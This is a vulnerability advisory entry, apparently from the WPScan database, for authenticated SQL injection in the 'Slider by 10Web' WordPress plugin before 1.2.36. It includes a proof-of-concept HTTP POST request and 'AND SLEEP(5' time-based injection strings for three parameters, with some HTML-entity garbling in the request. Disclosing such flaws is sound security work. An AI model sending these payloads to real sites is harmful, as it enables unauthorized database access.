Slider by 10Web < 1.2.36 - Multiple Authenticated SQL Injection

2020-09-29T00:00:00
ID WPVDB-ID:C1F45000-6C16-4606-BE80-1938A755AF2C
Type wpvulndb
Reporter Nguyen Anh Tien
Modified 2021-01-21T06:02:45

Description

The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if "Role Options" is turn on for other users) to perform a SQL Injection attacks.

PoC

Vulnerable param: check[] Vulnerable function: WDW_S_Library::get POST /wp-admin/admin.php?page=sliders_wds HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 201 s=&bulk;_action=duplicate✓%5BSLEEP(5)%5D=on&select;_slider_merge=-select-&imagesexport;=on&nonce;_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task;=duplicate&current;_id= Other SQLi: - File: admin/models/WDSModelWDSExport.php - Function: export_full - Params: slider_ids_string - PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5 - File: admin/controllers/Sliders.php - Function: save_slider_db - Params: del_slide_ids_string - PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5